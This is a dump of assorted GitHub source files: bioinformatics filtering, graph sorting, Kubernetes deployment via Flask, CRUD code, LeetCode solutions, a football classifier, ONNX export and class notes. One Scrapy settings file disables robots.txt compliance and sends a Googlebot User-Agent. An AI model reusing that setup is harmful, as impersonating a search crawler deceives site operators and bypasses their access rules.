alignment.query:\n\t\tcontinue\n\n\tsequence_output.append(seq_ref)\n\nSeqIO.write(sequence_output,open(snakemake.output[0],\"w\"),\"fasta\")\n\n","repo_name":"ArmaanAhmed22/NonSpecificLAMPDesign","sub_path":"preprocess/sequence_filter.py","file_name":"sequence_filter.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"74861600864","text":"class Vertex:\n def __init__(self, name):\n self.name = name\n\n\ngraph = {\n # 有向无环图\n # 'A': ['B', 'C'],\n # 'B': ['E'],\n # 'C': ['D'],\n # 'D': ['B'],\n # 'E': [],\n\n # 有向有环图\n # 'A': ['B'],\n # 'B': ['D', 'E'],\n # 'C': ['A'],\n # 'D': ['C'],\n # 'E': [],\n\n 'A': ['B', 'C', 'D'],\n 'B': ['D', 'E'],\n 'C': ['F'],\n 'D': ['C', 'F', 'G'],\n 'E': ['D', 'G'],\n 'F': [],\n 'G': ['F']\n}\n\n\ndef top_sort():\n '''\n 简单的拓扑排序\n :return: 打印节点名和顺序\n '''\n for counter in range(0, len(graph)):\n # 查找入度为0的顶点\n v = findNewVertexOfIndegreeZero()\n # 如果查找不到,说明存在环\n if v is None:\n raise Exception('存在环')\n print('{}的顺序是{}'.format(v, counter))\n # 删除该顶点以及其边\n del graph[v]\n\n\ndef findNewVertexOfIndegreeZero():\n '''\n 查找入度为0的节点\n :return:\n '''\n # 外层循环,遍历所有的节点\n for v in graph.keys():\n # 内层循环,遍历每个节点的邻接节点列表\n for l in graph.values():\n # 如果发现当前节点出现在某节点的邻接列表里,说明它的入度不为0,跳出循环\n if v in l:\n break\n # 如果未出现在所有的邻接列表里,则说明入度为0,return它\n else:\n return v\n\n\ndef top_sort2():\n # 将所有的节点入度初始化为0\n in_degrees = dict((u, 0) for u in graph.keys())\n # 计算所有节点的入度,访问所有顶点的邻接表,出现的次数就是入度\n for v in graph.keys():\n for w in graph[v]:\n in_degrees[w] += 1\n # 筛选入度为0的顶点\n q = [u for u in in_degrees if in_degrees[u] == 0]\n seq = []\n #使用列表的append和pop实现栈,保存入度为0的顶点\n while q:\n u = q.pop()\n seq.append(u)\n # 获取与u邻接的顶点并将其入度-1\n for v in graph[u]:\n in_degrees[v] -= 1\n if in_degrees[v] == 0:\n q.append(v)\n #如果排序后的顶点数和图中的顶点数相同\n if len(seq) == len(in_degrees):\n print(seq)\n return seq\n else:\n return None\n\n\n\nif __name__ == '__main__':\n # top_sort()\n # top_sort2()\n q = []\n q.append(1)\n q.append(2)\n q.append(3)\n print(q)\n a = q.pop()\n print(a)\n print(q)","repo_name":"zjxht62/LearnPython","sub_path":"DataStructureAndAlgorithm/graph/graph_demo.py","file_name":"graph_demo.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"16232745050","text":"# -*- coding: utf-8 -*-\nimport os\n\n# Project absolute path\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n# Scrapy settings for hopwork project\nBOT_NAME = 'hopwork'\n\nSPIDER_MODULES = ['hopwork.spiders']\nNEWSPIDER_MODULE = 'hopwork.spiders'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\n# Configure maximum concurrent requests performed by Scrapy\nCONCURRENT_REQUESTS = 16\n\n# Configure a delay for requests for the same website\nDOWNLOAD_DELAY = 0\n\n# Enable http cookies\nCOOKIES_ENABLED = True\n\n# Override the default request headers:\nDEFAULT_REQUEST_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.6,uk;q=0.4,und;q=0.2',\n 'Referer': 'https://www.hopwork.fr',\n 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\nDOWNLOADER_MIDDLEWARES = {\n # 'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware': None,\n # 'random_useragent.RandomUserAgentMiddleware': 400\n}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'hopwork.pipelines.HopworkPipeline': 300,\n}\n\n# Show skipped requests\nDUPEFILTER_DEBUG = True","repo_name":"lisneifild/hopwork","sub_path":"hopwork/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36636626297","text":"import json, yaml\nfrom flask import Flask, request\nfrom prometheus_flask_exporter import PrometheusMetrics\nfrom os import path\nimport time\nfrom kubernetes import client, config\n\nconfig.load_kube_config()\napp = Flask(__name__)\nmetrics = PrometheusMetrics(app)\n\n\n@app.route('/regist', methods=['POST'])\ndef robot_registration():\n response = {'success': False}\n\n # parameters = {'name': ''}, request.post\n paramaters = json.loads(request.get_data())\n name = paramaters['name']\n response['success'] = True\n k8s_apps_v1 = client.AppsV1Api()\n\n # statepublisher.yaml\n with open(path.join(path.dirname(__file__), \"rb-function/statepublisher.yaml\")) as file:\n dep = yaml.safe_load(file)\n # paramater change\n dep['spec']['template']['spec']['containers'][0]['env'][1]['value'] ='{}'.format(name)\n dep['metadata']['name'] = 'ros-state-publisher-{}'.format(name.replace('_', '-'))\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n\n time.sleep(5)\n\n # Deployment create, rb_name = name\n # slamgmapping.yaml\n with open(path.join(path.dirname(__file__), \"rb-function/slamgmapping.yaml\")) as file:\n dep3 = yaml.safe_load(file)\n # paramater change\n dep3['spec']['template']['spec']['containers'][0]['env'][1]['value'] ='{}'.format(name)\n dep3['metadata']['name'] = 'ros-slam-gmapping-{}'.format(name.replace('_', '-'))\n k8s_apps_v1 = client.AppsV1Api()\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep3, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n\n time.sleep(5)\n\n # mapmerge.yaml\n try:\n k8s_apps_v1.delete_namespaced_deployment(name='ros-map-merge', namespace='default')\n except:\n print('map merge is not existe')\n with open(path.join(path.dirname(__file__), \"rb-function/mapmerge.yaml\")) as file:\n dep6 = yaml.safe_load(file)\n # paramater change\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep6, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n return response\n\n\n@app.route('/')\ndef get_check():\n return \"checking Running Server\"\n\n\nif __name__=='__main__':\n app.run(host='114.70.21.161', port='8082')\n\n","repo_name":"ChanghyunRyu/R2C-Robot_to_Cloud","sub_path":"cloud_api/regist-api-server.py","file_name":"regist-api-server.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35717547533","text":"from sqlalchemy.orm import Session\n\nimport models, schemas\n\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n return db.query(models.Item).offset(skip).limit(limit).all()\n\n\ndef get_item_id(db: Session, item_id: int):\n return db.query(models.Item).filter(models.Item.id == item_id).first()\n\ndef get_item_title(db: Session, title: str):\n return db.query(models.Item).filter(models.Item.title == title).first()\n\n\ndef create_item(db: Session, item: schemas.ItemCreate):\n db_item = models.Item(**item.dict())\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n#crud.mod_item(db, item_id=item_id,item = item\ndef mod_item(db: Session, item: schemas.Item):\n db_item = db.query(models.Item).filter(models.Item.id == item.id).first()\n if not db_item:\n raise HTTPException(status_code=404, detail=\"Item not found\")\n item_data = item.dict(exclude_unset=True)\n for key, value in item_data.items():\n setattr(db_item, key, value)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n \n return db_item\n\ndef del_item(db: Session, item_id: int):\n db_item =db.query(models.Item).filter(models.Item.id == item_id).first()\n db.delete(db_item)\n db.commit()\n #db.refresh(db_item)\n return db_item \n","repo_name":"Antonioarf/megadados_p1","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"43754667518","text":"from mtda.console.serial import SerialConsole\nfrom mtda.support.usb import Composite\n\n\nclass UsbFunctionConsole(SerialConsole):\n\n def __init__(self, mtda):\n super().__init__(mtda)\n self.hotplug = True\n self.port = None\n self.rate = 9600\n Composite.mtda = mtda\n\n def configure(self, conf, role='console'):\n self.mtda.debug(3, \"console.usbf.configure()\")\n\n super().configure(conf)\n if self.port is None:\n self.port = \"/dev/ttyGS0\" if role == \"console\" else \"/dev/ttyGS1\"\n result = Composite.configure(role, conf)\n\n self.mtda.debug(3, \"console.usbf.configure(): {}\".format(result))\n return result\n\n def configure_systemd(self, dir):\n return None\n\n\ndef instantiate(mtda):\n return UsbFunctionConsole(mtda)\n","repo_name":"siemens/mtda","sub_path":"mtda/console/usbf.py","file_name":"usbf.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"14198841425","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nimport math\nfrom collections import defaultdict\n\n\nclass DSU:\n def __init__(self, N: int):\n self.par = list(range(N))\n self.rnk = [0] * N\n # zero must be the ultimate parent, such that whoever unions with zero,\n # its parent will be zero, regardless of when the union happens\n self.rnk[0] = math.inf\n\n def find(self, x: int) -> int:\n if self.par[x] != x:\n self.par[x] = self.find(self.par[x])\n return self.par[x]\n\n def union(self, x: int, y: int) -> bool:\n x_par, y_par = self.find(x), self.find(y)\n if x_par == y_par:\n return False\n if self.rnk[x_par] > self.rnk[y_par]:\n self.par[y_par] = x_par\n elif self.rnk[x_par] < self.rnk[y_par]:\n self.par[x_par] = y_par\n else:\n self.rnk[x_par] += 1\n self.par[y_par] = x_par\n return True\n\n def detach(self, x: int) -> None:\n \"\"\"Detach x from any group it might have been associated with.\"\"\"\n self.par[x] = x\n self.rnk[x] = 0\n\n\nclass Solution:\n def findAllPeople(self, n: int, meetings: List[List[int]], firstPerson: int) -> List[int]:\n \"\"\"This is a good problem. It is apparently union-find, but there are\n two twists.\n\n First, we need to deal with the situation like this\n\n [[3,1,3],[1,2,2],[0,3,3]] with firstPerson = 3\n\n The first meeting is between 1 and 2; neither has secret. The second\n meeting is between 3 and 1, so now 1 has secret. However, the meeting\n between 1 and 2 happens earlier. Thus, 2 still does not have secret,\n despite 1 having secret. If we use a naive union-find, where 1 and 2\n are unioned. Then when 1 and 3 are unioned, 2 would've been unioned\n with 3 as well, making him share secret. We must break such tie. Hence\n during iteration of the meeting (in ascending time order), whenever all\n the meetings of the same time have ended, we check to see if any of the\n people involved does not share secret. For such outsider, we must cut\n its tie to any of the union before.\n\n Second, we want anyone that union with someone else who has zero as\n parent to also have zero as parent. However, since the union is decided\n by the rank of the parent, it is likely the rank of zero is lower than\n the rank of another parent, if the other parent is unioned ahead of\n time. Therefore, we must arbitrarily set the rank of zero maximum,\n thus guaranteeing that whoever unions with some with parent as zero\n also gets zero as parent.\n\n O(MlogM + (M + N)alpha(N)), where M = len(meetings), and alpha(N) is\n the inverse function of Ackermann function, which describes the time\n complexity of union find with path compression.\n\n 5625 ms, faster than 12.50%\n\n Time complexity inspired by: https://leetcode.com/problems/find-all-people-with-secret/discuss/1599815/C%2B%2B-Union-Find\n \"\"\"\n meetings.sort(key=lambda tup: tup[2])\n dsu = DSU(n)\n dsu.union(0, firstPerson)\n pre_t = 0\n outsider = set()\n for x, y, t in meetings:\n if t != pre_t:\n for p in outsider:\n if dsu.find(p) != 0:\n # at the end of a specific time, if a person is not\n # part of the secret, he must be removed of any\n # connection to any other outsider who might become an\n # insider later on. 
This is to avoid such other outsider\n # becoming an insider pulls the current person into the\n # secret as well\n dsu.detach(p)\n outsider = set()\n dsu.union(x, y)\n pre_t = t\n if dsu.find(x):\n outsider.add(x)\n if dsu.find(y):\n outsider.add(y)\n return [i for i in range(n) if dsu.find(i) == 0]\n\n\nsol = Solution()\ntests = [\n (6, [[1,2,5],[2,3,8],[1,5,10]], 1, [0,1,2,3,5]),\n (4, [[3,1,3],[1,2,2],[0,3,3]], 3, [0,1,3]),\n (5, [[3,4,2],[1,2,1],[2,3,1]], 1, [0,1,2,3,4]),\n (6, [[0,2,1],[1,3,1],[4,5,1]], 1, [0,1,2,3]),\n (6, [[0,2,1],[1,3,1],[4,5,1],[1,4,1]], 1, [0,1,2,3,4,5]),\n (5, [[1,4,3],[0,4,3]], 3, [0,1,3,4]),\n (4, [[1,2,1],[0,3,1],[2,0,1]], 3, [0,1,2,3])\n]\n\nfor i, (n, meetings, firstPerson, ans) in enumerate(tests):\n res = sol.findAllPeople(n, meetings, firstPerson)\n res.sort()\n ans.sort()\n if res == ans:\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"LeetCode_2092.py","file_name":"LeetCode_2092.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"4748626636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 27 15:09:30 2015\n\n@author: Pete\n\nThis module is a test processing module for data created with TurbineDAQ.\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport pandas as pd\n\nprint(\"Imported processing module\")\n\ndef process_run(section, nrun):\n print(\"Processing\", section, \"run\", nrun)\n summary = pd.Series()\n summary[\"mean_cp\"] = 0.3\n return summary\n\ndef process_latest_run(section):\n print(\"Processing latest run of\", section)","repo_name":"petebachant/TurbineDAQ","sub_path":"test/Modules/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"5153067986","text":"class GameTickPacket:\n def __init__(self, bots):\n self.bots = bots\n self.rockets = [rockets()] * len(self.bots)\n self.bounds = bounds()\n self.latest_tick = 0\n self.attributes = [None, None]\n\n def update(self, index):\n self.rockets[index].verticalSpeed.append(self.bots[index].verticalSpeed[0])\n self.rockets[index].horizontalSpeed.append(self.bots[index].horizontalSpeed[0])\n self.rockets[index].x.append(self.bots[index].x)\n self.rockets[index].y.append(self.bots[index].y)\n self.rockets[index].isDead.append(self.bots[index].isDead)\n self.rockets[index].thrust.append(self.bots[index].thrust_power)\n self.attributes[0] = self.bounds.attributes\n self.attributes[1] = self.rockets[index].attributes\n # print(self.attributes)\n self.latest_tick += 1\n\n def reset(self):\n self.__init__(self.bots)\n\n\nclass rockets:\n def __init__(self):\n self.verticalSpeed = []\n self.x = []\n self.y = []\n self.horizontalSpeed = []\n self.thrust = []\n self.isDead = []\n self.attributes = [self.verticalSpeed, self.x, self.y, self.horizontalSpeed, self.thrust, self.isDead]\n\n\nclass bounds:\n def __init__(self):\n self.x = 640\n self.y = 480\n self.attributes = (self.x, self.y)\n","repo_name":"iamPres/self-landing-rockets","sub_path":"GameTickPacket.py","file_name":"GameTickPacket.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7552410951","text":"from libdesklets.controls import Control\nfrom IArrayBuffer import IArrayBuffer\n\n\n#----------------------------------------------------------------------------------#\n#\n# ArrayBuffer Class\n#\n#\nclass ArrayBuffer(Control, IArrayBuffer):\n\n #\n # ArrayBuffer Constructor\n #\n def __init__(self):\n\n self.__buffer = []\n self.__size = 0\n self.__cursor = 0\n self.__window_pos = 0\n self.__window_size = 0\n self.__filltype = None\n\n Control.__init__(self)\n\n\n #\n # Get the current object at cursor position\n #\n def __read(self):\n\n return self.__buffer[self.__window_pos:self.__window_pos + \\\n self.__window_size]\n\n\n #\n # Get the entire buffer\n #\n def __read_all(self):\n\n return self.__buffer\n\n\n #\n # Deletes a single line from the buffer\n #\n def __delete(self, pos):\n\n self.__buffer = [self.__filltype] + self.__buffer[:pos] + \\\n self.__buffer[pos + 1:]\n\n\n #\n # Fill the buffer with an object\n #\n def __fill(self, obj):\n\n for i in range(self.__size):\n self.__buffer[i] = obj\n\n\n #\n # Write object to current cursor position within buffer\n #\n def __write(self, objArr):\n\n n = len(objArr)\n\n if self.__cursor + n > self.__size:\n if n >= self.__size:\n tmp = n - self.__size\n self.__buffer = objArr[tmp:]\n\n else:\n tmp = self.__size - n\n self.__buffer = self.__buffer[self.__cursor - \\\n tmp:self.__cursor]\n self.__buffer += objArr\n\n self.__cursor = self.__size\n\n else:\n self.__buffer[self.__cursor:] = objArr + \\\n self.__buffer[self.__cursor + n:]\n self.__cursor += n\n\n\n #\n # Get the current viewable window position\n #\n def __get_window_pos(self):\n\n return self.__window_pos\n\n\n #\n # Get the filltype\n #\n def __get_filltype(self):\n\n return self.__filltype\n\n\n #\n # Sets the filltype used when resizing the buffer\n #\n def __set_filltype(self, obj):\n\n self.__filltype = obj\n\n\n #\n # Set the viewable window position\n #\n def __set_window_pos(self, pos):\n\n if pos < 0:\n pos = 0\n\n if pos + self.__window_size > self.__size:\n pos = self.__size - self.__window_size\n\n self.__window_pos = pos\n\n\n #\n # Get the size of the viewable window\n #\n def __get_window_size(self):\n\n return self.__window_size\n\n\n #\n # Set the size of the viewable window\n #\n def __set_window_size(self, size):\n\n if size > self.__size:\n size = self.__size\n\n self.__window_size = size\n\n\n #\n # Get the size of the buffer\n #\n def __get_size(self):\n\n return self.__size\n\n\n #\n # Set the size of the buffer\n #\n def __set_size(self, size):\n\n if size > self.__size:\n\n tmp = [ self.__filltype for i in range(size - self.__size) ]\n\n self.__buffer = tmp + self.__buffer\n\n else:\n self.__buffer = self.__buffer[self.__size - size:]\n\n self.__size = size\n\n\n #\n # Get the current buffer cursor position\n #\n def __get_cursor(self):\n\n return self.__cursor\n\n\n #\n # Set the position of the buffer cursor\n #\n def __set_cursor(self, pos):\n\n if pos < 0:\n pos = 0\n\n if pos > self.__size:\n pos = self.__size\n\n self.__cursor = pos\n\n\n #\n # Interface\n #\n read = property(fget = __read,\n doc = \"Return the viewable window array\")\n read_all = property(fget = __read_all,\n doc = \"Return the entire buffer array\")\n delete = property(fset = __delete,\n doc = \"Delete line from buffer\")\n write = property(fset = __write,\n doc = \"Write line at position cursor\")\n fill = property(fset = __fill,\n doc = \"Fill the buffer with an object\")\n filltype = property(fget = __get_filltype, fset = 
__set_filltype,\n doc = \"Get/Set the empty space fill type\")\n window_pos = property(fget = __get_window_pos, fset = __set_window_pos,\n doc = \"Get/Set viewable window position\")\n window_size = property(fget = __get_window_size, fset = __set_window_size,\n doc = \"Get/Set viewable window size\")\n size = property(fget = __get_size, fset = __set_size,\n doc = \"Get/Set buffer size\")\n cursor = property(fget = __get_cursor, fset = __set_cursor,\n doc = \"Get/Set cursor position\")\n\n\n#----------------------------------------------------------------------------------#\n\ndef get_class(): return ArrayBuffer\n\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"Controls/ArrayBuffer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17285871882","text":"from flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\ndb = SQLAlchemy()\n\n\nclass Task(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n name = db.Column(db.String( 250), nullable=False)\n description = db.Column(db.Text)\n created_at = db.Column(db.DateTime)\n completed = db.Column(db.Boolean , default=False)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.created_at = datetime.now() ","repo_name":"Kholoud731/Flask-API","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"2690658187","text":"import pandas as pd\nimport numpy as np\nimport sqlite3 as sql\nfrom sklearn.ensemble import RandomForestClassifier\nfrom pprint import pprint\nimport itertools\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\npd.options.display.expand_frame_repr = False\n\n\ndef plot_confusion_matrix(cm, fig, ax, classes,\n normalize=False,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n tick_marks = range(len(classes))\n ax.set_xticks(tick_marks)\n ax.set_yticks(tick_marks)\n ax.set_xticklabels(classes)\n ax.set_yticklabels(classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n ax.invert_yaxis()\n\nconn = sql.connect('Data/database.sqlite')\n\n# query = 'SELECT * FROM Match INNER JOIN League on League.id = Match.league_id'\n\nquery = 'SELECT * FROM Match WHERE league_id == 1729'\n\n# fields = ['home_team_api_id', 'away_team_api_id', 'date', 'home_team_goal', 'away_team_goal']\n# more_fields = ['goal', 'shoton', 'shotoff', 'possession', 'cross', 'corner', 'foulcommit']\n# odds = ['B365H', 'B365D', 'B365A', 'BWH', 'BWD', 'BWA', 'IWH', 'IWD', 'IWA', 'LBH', 'LBD', 'LBA', 'PSH', 'PSD']\n\ndf = pd.read_sql_query(query, conn, index_col='id')\n\ndf['GD'] = df['home_team_goal'] - df['away_team_goal']\ndf = df.loc[df['GD'] != 0]\ndf['result'] = np.where(df['GD'] > 0, 1, 0)\n\n# CHOOSE FEATURES\n# --------------------------------------------------------------------------------------------------\nFEATURES = ['B365H', 'BWH', 'LBH']\ndf = df.loc[:, ['result'] + FEATURES]\n# --------------------------------------------------------------------------------------------------\n\ndf = df.sample(frac=1) # shuffle\ndf = df.dropna() # drop NaNs\n\nsplit = 0.80\nsplit_idx = int(split * len(df))\ntrain_df = df.iloc[:split_idx, :]\ntest_df = df.iloc[split_idx:, :]\n\n\nX_train = train_df.loc[:, FEATURES]\nT_train = train_df.loc[:, 'result']\n\n\nRF = RandomForestClassifier()\nRF.fit(X_train, T_train)\ntraining_results = RF.predict(X_train)\n\nY = training_results\nT = T_train\ncm = confusion_matrix(y_true=T, y_pred=Y)\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.set_title('Train results')\nplot_confusion_matrix(cm, fig, ax1, ['loss', 'win'])\n\n# TEST\nX_test = test_df.loc[:, FEATURES]\nT_test = test_df.loc[:, 'result']\n\ntesting_results = RF.predict(X_test)\n\nY = testing_results\nT = T_test\ncm = confusion_matrix(y_true=T, y_pred=Y)\nplot_confusion_matrix(cm, fig, ax2, ['loss', 'win'])\nax2.set_title('Test results')\nplt.tight_layout()\nplt.show()\n","repo_name":"AvraSaslow/Soccer-Events-Prediction-Model","sub_path":"democlassifier.py","file_name":"democlassifier.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72844830942","text":"from __future__ import print_function\nimport argparse\nimport torch\n#from utils.nms.py_cpu_nms import py_cpu_nms\nfrom models.faceboxes import FaceBoxes\n\nparser = argparse.ArgumentParser(description='FaceBoxes')\n\nparser.add_argument('-m', '--trained_model', default='weights/FaceBoxesProd.pth',\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--save_folder', default='onnx/FaceBoxes.onnx', type=str, help='Dir to save results')\nparser.add_argument('--cpu', action=\"store_true\", default=True, help='Use cpu inference')\nparser.add_argument('--dataset', default='PASCAL', type=str, choices=['AFW', 'PASCAL', 'FDDB'], help='dataset')\nparser.add_argument('--confidence_threshold', default=0.05, type=float, help='confidence_threshold')\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\nparser.add_argument('--nms_threshold', default=0.3, type=float, help='nms_threshold')\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\nparser.add_argument('-s', '--show_image', action=\"store_true\", default=False, help='show detection results')\nparser.add_argument('--vis_thres', default=0.5, type=float, help='visualization_threshold')\nargs = parser.parse_args()\n\n\ndef check_keys(model, pretrained_state_dict):\n ckpt_keys = set(pretrained_state_dict.keys())\n model_keys = set(model.state_dict().keys())\n used_pretrained_keys = model_keys & ckpt_keys\n unused_pretrained_keys = ckpt_keys - model_keys\n missing_keys = model_keys - ckpt_keys\n print('Missing keys:{}'.format(len(missing_keys)))\n print('Unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))\n print('Used keys:{}'.format(len(used_pretrained_keys)))\n assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'\n return True\n\n\ndef remove_prefix(state_dict, prefix):\n ''' Old style model is stored with all names of parameters sharing common prefix 'module.' 
'''\n print('remove prefix \\'{}\\''.format(prefix))\n f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x\n return {f(key): value for key, value in state_dict.items()}\n\n\ndef load_model(model, pretrained_path, load_to_cpu):\n print('Loading pretrained model from {}'.format(pretrained_path))\n if load_to_cpu:\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)\n else:\n device = torch.cuda.current_device()\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))\n if \"state_dict\" in pretrained_dict.keys():\n pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')\n else:\n pretrained_dict = remove_prefix(pretrained_dict, 'module.')\n check_keys(model, pretrained_dict)\n model.load_state_dict(pretrained_dict, strict=False)\n return model\n\n\nif __name__ == '__main__':\n \n torch.set_grad_enabled(False)\n # net and model\n net = FaceBoxes(phase='test', size=None, num_classes=2) # initialize detector\n net = load_model(net, args.trained_model, args.cpu)\n net.eval()\n input_names = [\"image\"]\n output_names = [\"class\",\"loc\"]\n dynamic_axes = {'image': {0: '-1'}, 'class': {0: '-1'}, 'loc': {0: '-1'}}\n dummy_input = torch.randn(1, 3, 1024, 1024)\n torch.onnx.export(net, dummy_input, args.save_folder, input_names = input_names, dynamic_axes = dynamic_axes, output_names = output_names, opset_version=11, verbose=True)\n\n\n\n \n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/face/FaceBoxes/faceboxes_pth2onnx.py","file_name":"faceboxes_pth2onnx.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"23758773151","text":"def merge(*args):\n fin = args[0] # на вывод\n my_keys = fin.keys() #мои ключи\n length = len(args)\n for i in range(1, length):\n temp_keys = args[i].keys() #проверк\n for k in temp_keys:\n if k in my_keys:\n if type(fin[k]) is list:\n temp = fin[k]\n else:\n temp = [fin[k]]\n temp.append(args[i][k])\n fin[k] = temp\n my_keys = fin.keys()\n else:\n fin[k] = args[i][k]\n return fin\n\na = {1:2, 3:4}\nb = {1:10, 2:5, 7:10}\nc = {1:7, 2:10}\nprint(merge(a, b, c))","repo_name":"paladinchik56/for-ITIS-by-Grisha","sub_path":"1 curse/test3/deb.py","file_name":"deb.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40635628806","text":"##10072014c.py\r\n##John brook\r\n##class notes from 10-07-2014\r\n\r\n\r\n\r\n##============================================================##\r\n###Base class\r\n##\r\n##class Critter(object):\r\n## \"\"\"A virtual pet\"\"\"\r\n## def talk(self): #class methoid #callable function\r\n## print(\"Hi. I'm an instance of class Critter.\")\r\n##\r\n##def main():\r\n## crit = Critter() #shortens class\r\n## crit.talk() #class w/ fun\r\n##\r\n##main()\r\n\r\n\r\n##============================================================##\r\n\r\n##class Critter(object):\r\n## \"\"\"A virtual pet\"\"\"\r\n## def talk(self): #class methoid #callable function\r\n## print(\"Hi. I'm an instance of class Critter.\")\r\n## def __init__(self, legs, color, toxic, name):\r\n## self.name = name\r\n## self.legs = legs\r\n## self.color = color\r\n## self.toxic = toxic\r\n## def __str__(self):\r\n## rep = \"Critter object\\n\"\r\n## rep += \"name: \" + self.name + \"\\n\"\r\n## rep += \"legs: \" + self.legs + \"\\n\"\r\n## rep += \"color: \" + self.color + \"\\n\"\r\n## rep += \"toxic: \" + self.toxic + \"\\n\"\r\n## return rep\r\n##\r\n##\r\n##def main():\r\n## crit = Critter(\"6\",\"blue\",\"yes\",\"frank\") #shortens class\r\n## crit.talk() #class w/ fun\r\n## print(crit)\r\n##\r\n## crit1 = Critter(\"6\",\"purple\",\"no\",\"bob\") #shortens class\r\n## crit.talk() #class w/ fun\r\n## print(crit1)\r\n##\r\n##main()\r\n##============================================================##\r\n\r\nclass playerClass(object):\r\n \"\"\"A virtual pet\"\"\"\r\n def talk(self): #class methoid #callable function\r\n print(\"Hi. I'm an instance of class Critter.\")\r\n def __init__(self,name, HP, MP, ATK, DEF):\r\n self.name = name\r\n self.HP = HP\r\n self.MP = MP\r\n self.ATK = ATK\r\n self.DEF = DEF\r\n \r\n def __str__(self):\r\n rep = \"Critter object\\n\"\r\n rep += \"Name: \" + self.name + \"\\n\"\r\n rep += \"HP: \" + self.HP + \"\\n\"\r\n rep += \"MP: \" + self.MP + 